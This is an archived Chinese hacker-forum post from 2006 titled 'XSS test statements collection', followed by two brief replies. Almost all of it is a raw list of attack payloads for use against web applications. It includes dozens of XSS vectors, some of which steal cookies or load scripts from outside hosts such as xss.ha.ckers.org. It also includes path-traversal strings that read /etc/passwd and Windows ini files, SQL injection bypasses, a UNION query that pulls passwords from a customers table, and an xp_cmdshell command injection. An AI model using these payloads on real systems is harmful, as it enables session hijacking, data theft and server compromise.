XSS测试语句大全(页 1) - [Exploits & Shellcode] 安全测试代码 - 岁月联盟 - 技术社区 - BBS.SYUE.COM 中国黑客门户网,黑客网站,红客网站

admin 发表于 2006-9-3 00:26

XSS测试语句大全

><script>alert(document.cookie)</script> <br/>='><script>alert(document.cookie)</script> <br/><script>alert(document.cookie)</script> <br/><script>alert(vulnerable)</script> <br/>%3Cscript%3Ealert('XSS')%3C/script%3E <br/><s&#99;ript>alert('XSS')</script> <br/><img src="javas&#99;ript:alert('XSS')"> <br/>%0a%0a<script>alert(\"Vulnerable\")</script>.jsp <br/>%22%3cscript%3ealert(%22xss%22)%3c/script%3e <br/>%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd <br/>%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini <br/>%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e <br/>%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e <br/>%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html <br/>%3f.jsp <br/>%3f.jsp <br/>&lt;script&gt;alert('Vulnerable');&lt;/script&gt <br/><script>alert('Vulnerable')</script> <br/>?sql_debug=1 <br/>a%5c.aspx <br/>a.jsp/<script>alert('Vulnerable')</script> <br/>a/ <br/>a?<script>alert('Vulnerable')</script> <br/>"><script>alert('Vulnerable')</script> <br/>';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& <br/>%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E <br/>%3Cscript%3Ealert(document. domain);%3C/script%3E& <br/>%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= <br/>1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= <br/>../../../../../../../../etc/passwd <br/>..\..\..\..\..\..\..\..\windows\system.ini <br/>\..\..\..\..\..\..\..\..\windows\system.ini <br/>'';!--"<XSS>=&{()} <br/><IMG SRC="javascript:alert('XSS');"> <br/><IMG SRC=javascript:alert('XSS')> <br/><IMG SRC=JaVaScRiPt:alert('XSS')> <br/><IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)> <br/><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41> <br/><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <br/><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <br/><IMG SRC="jav&#x09;ascript:alert('XSS');"> <br/><IMG SRC="jav&#x0A;ascript:alert('XSS');"> <br/><IMG SRC="jav&#x0D;ascript:alert('XSS');"> <br/>"<IMG SRC=java\0script:alert(\"XSS\")>";' > out <br/><IMG SRC=" javascript:alert('XSS');"> <br/><SCRIPT>a=/XSS/alert(a.source)</SCRIPT> <br/><BODY BACKGROUND="javascript:alert('XSS')"> <br/><BODY ONLOAD=alert('XSS')> <br/><IMG DYNSRC="javascript:alert('XSS')"> <br/><IMG LOWSRC="javascript:alert('XSS')"> <br/><BGSOUND SRC="javascript:alert('XSS');"> <br/><br size="&{alert('XSS')}"> <br/><LAYER SRC="<a href="http://xss.ha.ckers.org/a.js"></layer">http://xss.ha.ckers.org/a.js"></layer</a>> <br/><LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <br/><IMG SRC='vbscript:msgbox("XSS")'> <br/><IMG SRC="mocha:[code]"> <br/><IMG SRC="livescript:[code]"> <br/><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <br/><IFRAME SRC=javascript:alert('XSS')></IFRAME> <br/><FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET> <br/><TABLE BACKGROUND="javascript:alert('XSS')"> <br/><DIV STYLE="background-image: url(javascript:alert('XSS'))"> <br/><DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> <br/><DIV STYLE="width: expression(alert('XSS'));"> <br/><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <br/><IMG STYLE='xss:expre\ssion(alert("XSS"))'> <br/><STYLE TYPE="text/javascript">alert('XSS');</STYLE> <br/><STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <br/><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <br/><BASE HREF="javascript:alert('XSS');//"> <br/>getURL("javascript:alert('XSS')") <br/>a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); <br/><XML SRC="javascript:alert('XSS');"> <br/>"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" <br/><SCRIPT SRC="<a href="http://xss.ha.ckers.org/xss.jpg"></SCRIPT">http://xss.ha.ckers.org/xss.jpg"></SCRIPT</a>> <br/><IMG SRC="javascript:alert('XSS')" <br/> <br/><IMG SRC="<a href="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode</a>"> <br/><SCRIPT a=">" SRC="<a href="http://xss.ha.ckers.org/a.js"></SCRIPT">http://xss.ha.ckers.org/a.js"></SCRIPT</a>> <br/><SCRIPT =">" SRC="<a href="http://xss.ha.ckers.org/a.js"></SCRIPT">http://xss.ha.ckers.org/a.js"></SCRIPT</a>> <br/><SCRIPT a=">" '' SRC="<a href="http://xss.ha.ckers.org/a.js"></SCRIPT">http://xss.ha.ckers.org/a.js"></SCRIPT</a>> <br/><SCRIPT "a='>'" SRC="<a href="http://xss.ha.ckers.org/a.js"></SCRIPT">http://xss.ha.ckers.org/a.js"></SCRIPT</a>> <br/><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="<a href="http://xss.ha.ckers.org/a.js"></SCRIPT">http://xss.ha.ckers.org/a.js"></SCRIPT</a>> <br/><A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A> <br/>admin'-- <br/>' or 0=0 -- <br/>" or 0=0 -- <br/>or 0=0 -- <br/>' or 0=0 # <br/>" or 0=0 # <br/>or 0=0 # <br/>' or 'x'='x <br/>" or "x"="x <br/>') or ('x'='x <br/>' or 1=1-- <br/>" or 1=1-- <br/>or 1=1-- <br/>' or a=a-- <br/>" or "a"="a <br/>') or ('a'='a <br/>") or ("a"="a <br/>hi" or "a"="a <br/>hi" or 1=1 -- <br/>hi' or 1=1 -- <br/>hi' or 'a'='a <br/>hi') or ('a'='a <br/>hi") or ("a"="a<p></p>

黑暗传说 发表于 2008-3-31 14:26

XSS测试语句大全，真的好好看一下跨库语句

xyh1020 发表于 2008-4-10 12:17

学习了，

页: [1]

岁月联盟 - 技术社区 - BBS.SYUE.COM's Archiver

XSS测试语句大全